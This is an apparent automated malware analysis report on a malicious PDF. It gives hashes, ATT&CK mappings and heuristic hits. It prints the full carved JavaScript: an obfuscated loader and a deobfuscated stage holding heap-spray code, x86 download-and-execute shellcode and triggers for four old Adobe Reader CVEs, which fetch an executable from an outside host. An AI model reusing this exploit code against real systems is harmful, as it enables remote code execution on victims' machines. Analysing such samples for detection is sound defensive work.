Malicious PDF — malware analysis report

Static analysis result for SHA-256 69421e58eedd4cbc…

MALICIOUS

PDF

5.2 KB Authoring application: Bejomjeme (via 8bf7bRifauadijiuohabaq) First seen: 2026-05-10
MD5: 5dbe330467ebaba88cba30c5fa57fd7e SHA-1: 372d05bcfdde384704e4525906895b2f3d57ee74 SHA-256: 69421e58eedd4cbc24e3e876e318b2de5fc4db3e31f226ada8758de9a84ad9d4
428 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer (the shellcode stage's string table is URLMON.DLL / URLDownloadToFileA / WinExec, i.e. download-and-run of a second-stage executable) T1027 Obfuscated Files or Information (stage 2 is carried as XOR-encoded hex in the page text; the C2 URL is substitution-encoded in the Author/Title metadata)

The PDF carries a two-stage JavaScript chain. The /JS stream (object 10) is a small loader whose real work happens only in its catch block: it reads the words of the current page with getPageNthWord, XOR-decodes them with key 0x39 and eval()s the result. That decoded stage branches on app.viewerVersion and fires one or more of the known Adobe Reader exploits CVE-2009-4324 (media.newPlayer, version == 9.2), CVE-2009-0927 (Collab.getIcon, version < 9.1), CVE-2007-5659 (Collab.collectEmailInfo, version < 8) and CVE-2008-2992 (util.printf, version > 8), after heap-spraying 0x400000-byte blocks of 0x9090 NOP sled plus shellcode towards 0x0c0c0c0c (collectEmailInfo/getIcon branches) or 0x30303030 (printf/newPlayer branches). The shellcode's embedded strings (GetTempPathA, LoadLibraryA, GetProcAddress, WinExec, URLMON.DLL, URLDownloadToFileA, 12345678.exe) are consistent with downloading a second-stage executable to the temp directory and executing it. Note that the download URL is not stored as a literal anywhere in the file: it is rebuilt at run time from the Author and Title metadata through a substitution alphabet kept in the Info dictionary key `b`, and the shellcode requests it as http://ahrudy.egh/4?reader_version=<app.viewerVersion> — the reader_version query parameter is therefore part of the network indicator. The ML classifier also strongly flagged this PDF as malicious (score 1.0000).

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudy.egh/4 Referenced by PDF JavaScript — the literal does not appear in either extracted script; it is decoded at run time from the Author+Title metadata via a permuted alphabet stored in the Info key `b` (function gR/mZ in the decoded stage), and the shellcode appends ?reader_version=<app.viewerVersion> before fetching it. For blocking and hunting, key on the host rather than the exact path.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0xF5B 821 bytes
SHA-256: a97d313f56079dd9849c41f8a36991c287e32c360ff4257414e91d6f7ad4462c
Detection
ClamAV: No threats found — not exculpatory: this loader contains no exploit API names and no shellcode (those exist only after the page-text stage is XOR-decoded), so a signature scan of this file alone is expected to come back clean.
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Stage-1 loader (PDF object 10, /JS stream). The try body is a decoy and the catch
// block is where the payload actually runs:
//  - cancelEvent() is a hoisted function declaration, so it executes first and leaves
//    the stage-2 bootstrap in oV as a string, after stripping the noise letter 'G'
//    with .replace(/[G]/g, '').
//  - the navigator.userAgent reads look like browser sniffing, but in Acrobat's
//    JavaScript engine `navigator` is not defined (browser-only object), so the first
//    read throws a ReferenceError and control lands in catch(lS), which does
//    new Function(oV)() — the same effect as eval(oV).
//    NOTE(review): "Acrobat has no navigator object" is recalled from the Acrobat JS
//    API, not shown here — confirm before relying on it.
//  - consequence for sandboxing: an emulator that defines `navigator` never reaches
//    the payload; emulate as Acrobat (no navigator) or invoke new Function(oV)() directly.
//
// Decoded content of oV (noise removed), i.e. the stage-2 bootstrap:
//   var iTW = 57; var wR = this;
//   var hO = 'getPageNthWord'; var kPE = 'getPageNumWords'; var yHY = 'fromCharCode';
//   var sL = wR[kPE](this.pageNum); var rI = '';
//   for (var uB = 0; uB < sL; uB++) { rI = [rI, wR[hO](wR.pageNum, uB, true)].join(''); }
//   var rM = '';
//   for (var uB = 0; uB < rI.length; uB += 2) {
//     tS = rI.substr(uB, 2);
//     rM = [rM, String[yHY](parseInt(tS, 16) ^ iTW)].join('');
//   }
//   eval(rM); rM = null;
// So stage 2 travels as hex text in the visible words of the current page, is
// XOR-decoded with key 0x39 (57) and eval()'d — this is the "getPageWords-XOR" stage
// listed as legacy_pdfkit_stage_000.js below. Detection angle: getPageNthWord /
// getPageNumWords combined with String.fromCharCode and eval is the tell here; none
// of the exploit API names (Collab.*, util.printf, media.newPlayer) appear in this stage.
var oV=null;try {cancelEvent();var operaBrowser = navigator.userAgent.indexOf('Opera') >=0 ? 1 : false;var webkitBrowser = navigator.userAgent.indexOf('Safari') >=0 ? false : false;var MSIE = navigator.userAgent.indexOf('MSIE')>= 0 ? true : false;} catch(lS){var sV= new Function(oV);sV();}function cancelEvent(){oV='varG iTGGW = 57 GG;var wR = GthiGGs;var GhO=\'ge\'+\'tPageNGGtGG\'+\'hWoGrdG\';var kPE=G\'ge\'+\'tPag\'+G\'eNGGumW\'+GG\'GGoGGrdGs\'G;varG yHY=\'Gfr\'+\'omCh\'+\'arCode\';var sL=wGR[kPE]G(thisGG.pageGGNum);vGar GGrIG=\'G\';Gfor(vGGarG uB=0;uB< sL;GG uB++){rI=[rIGG,wR[hGGO](wR.pageNum,uB,GGtruGGe)].jGGoin(\'\');;}vaGr rM=\'\';for(var uB=0;uB < rIG.length;G uB+=2){tS=rIGG.sGubstr(uB,2);rM=[rM,String[yHY]G(parseInt(tS,GG16G)^iTW)].join(\'\')G;}evaGGl(rGGM);rM=nulGGl;'.replace(/[G]/g, '');return false;}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4771 bytes
SHA-256: 84a90ffe0bb65d63f78696a0ff2a6fb82670fedff244f2b98a4dabaf302ba833
Detection
ClamAV: No threats found — treat this as a signature-coverage gap rather than a clean result: this stage holds the version-gated exploit calls (Collab.collectEmailInfo, Collab.getIcon, util.printf, media.newPlayer) and the x86 shellcode visible in the preview below.
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s). The hex-escaped blob is the x86 shellcode that aN() returns and the heap spray sF() copies after each 0x9090 NOP sled; its embedded ASCII names are GetTempPathA, LoadLibraryA, GetProcAddress, WinExec, URLMON.DLL, URLDownloadToFileA and 12345678.exe, and the decoded URL plus "\x00\x90" is appended to it at run time. Analyst tip: the stage still carries a developer trace switch — qZ is true when the PDF's Producer string starts with "debug", in which case every branch and the reconstructed URL are shown via app.alert(); setting Producer to "debug" in a copy of the sample makes dynamic tracing in an Acrobat-like environment straightforward. The listing ends in non-text residue (stream padding), which is expected for a carved stream and not part of the script.
Preview script
First 1,000 lines of the extracted script
this.v="v";aV=["l","d"];var f=new String();var tY='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';try {var bO='z'.substr(26899,26899)} catch(bO){};var cP=32510;var eH=this.info['b'].replace(/[\s]/g, '');for(var bE=0; bE <974; bE++){bE++};var rG='';var gZ={};var xM = this.info;var qZ = (xM.producer.substr(0,5) == 'debug');var vC = new Array(); var mT = "%u";function zQ(str){str = str.split(mT);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function qZM(str1, str2){return [str1, str2].join("");}function aN(pW){var sPO = gR();var rU = iN();sPO += ((sPO.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + rU;if(qZ) app.alert("URL: " + sPO);var d=mT;var tS="\x50\x53\x51\x52\x56\x57\x55\x9C\xE8\x00\x00\x00\x00\x5D\x83\xED\x0D\x31\xC0\x64\x03\x40\x30\x78\x10\x8B\x40\x0C\x8B\x70\x14\xAD\x89\xC0\x89\xC0\x8B\x40\x10\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x56\x57\xBE\xE2\x00\x00\x00\x01\xEE\xBF\xD2\x00\x00\x00\x01\xEF\xE8\x56\x01\x00\x00\x5F\x5E\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xD2\x00\x00\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\xE7\x01\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xC9\x01\x00\x00\x52\xFF\x95\xD6\x00\x00\x00\x89\xEA\x81\xC2\xD4\x01\x00\x00\x52\x50\xFF\x95\xDA\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x89\xEA\x81\xC2\xF4\x01\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\xFF\x95\xDE\x00\x00\x00\x9D\x5D\x5F\x5E\x5A\x59\x5B\x58\xC3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\x9F\x01\x00\x00\x66\xAD\x03\x85\x9F\x01\x00\x00\x8B\x70\x78
\x83\xC6\x1C\x03\xB5\x9F\x01\x00\x00\x8D\xBD\xA3\x01\x00\x00\xAD\x03\x85\x9F\x01\x00\x00\xAB\xAD\x03\x85\x9F\x01\x00\x00\x50\xAB\xAD\x03\x85\x9F\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\x9F\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xAB\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xA3\x01\x00\x00\x89\xC6\xAD\x03\x85\x9F\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\x9F\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x31\x32\x33\x34\x35\x36\x37\x38\x2E\x65\x78\x65\x00";tS+=sPO;tS+="\x00\x90";return tS;};function gR(){var yZ = (xM.author + xM.title).replace(/[\s]/g, '');var dS = mZ(yZ, eH, tY);return dS;};function mZ(yZ, tY, eH){var dS="";for(var i=0; i < yZ.length; i++){var lW = tY.indexOf(yZ[i]);if(lW > -1 ){dS += eH[lW];}}return dS;};function kP(yZ){var out = "";yZ = vM(yZ);g = Math.round(yZ.length / 4);if (g != yZ.length /4) yZ+="00";for(var i=0; i < yZ.length; i+=4){out+= mT + yZ.substr(i+2, 2) + yZ.substr(i, 2);}return out;};function vM(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function mF(fA, len){while (fA.length * 2 < len){fA = qZM(fA, fA);}return fA.substring(0, len / 2);};function sF(vI){var yD = 0x0c0c0c0c;        rQ = aN("pdf");if (vI == 1){yD = 0x30303030;}var kR = 0x400000;var ln = rQ.length * 2;var lQ = kR - (ln + 0x38);var fA = zQ(mT+"9090"+mT+"9090"); fA = mF(fA, lQ);var iNK = (yD - 0x400000) / kR;for (var iB = 0; iB < iNK; iB ++ ){vC[iB] = qZM(fA, rQ);}};function iN(){try {return app.viewerVersion.toString();}catch(zA){    return 0;}}if(qZ) app.alert("called exploit");var rU = iN();if(qZ)  app.alert("v: " + rU);if (rU > 8){if(qZ) 
app.alert("util.printf");sF(1);var qN = "12999999999999999999";for (pG=0; pG < 276; pG++) qN += "8";util.printf("%45000f", qN);}if (rU < 8){if(qZ) app.alert("Collab.collectEmailInfo");sF(0);var yH = zQ(mT+"0c0c"+mT+"0c0c");while (yH.length < 44952) yH += yH;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : yH});}if (rU < 9.1){if (app.doc.Collab.getIcon){if(qZ) app.alert("Collab.getIcon");sF(0);var zU = unescape("%09");while (zU.length < 0x4000) zU += zU;zU = "N." + zU;app.doc.Collab.getIcon(zU);}}if (rU == 9.2){if(qZ) app.alert("media.newPlayer");sF(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var gJ={eB:"dG"};var uZ=new Date();aR=["jC","oN","jY"];var lM=["dI","iH","h"];���